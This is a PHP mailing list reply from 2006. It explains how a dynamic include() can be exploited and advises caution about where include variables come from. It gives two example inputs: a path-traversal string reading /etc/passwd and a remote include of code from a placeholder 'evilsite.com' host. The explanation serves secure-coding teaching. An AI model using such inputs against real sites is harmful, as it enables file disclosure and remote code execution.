On Tuesday 13 June 2006 21:17, Dave M G wrote: > If there is some other way for them to exploit a dynamic include() > function, then please let me know. $untrusted_var = '../../../../../../../etc/passwd'; include($untrusted_var); Or in later versions of PHP, I *think* the following may even work: $untrusted_var = 'http://evilsite.com/pub/evil.php'; include($untrusted_var); Now, having a variable inside an include() is not automatically bad. It can be a good way to make code cleaner and allow you to conditionally include certain libraries only when you need them. Just be very very careful about where those variables come from. -- Larry Garfield AIM: LOLG42 larry@xxxxxxxxxxxxxxxx ICQ: 6817012 "If nature has made any one thing less susceptible than all others of exclusive property, it is the action of the thinking power called an idea, which an individual may exclusively possess as long as he keeps it to himself; but the moment it is divulged, it forces itself into the possession of every one, and the receiver cannot dispossess himself of it." -- Thomas Jefferson -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
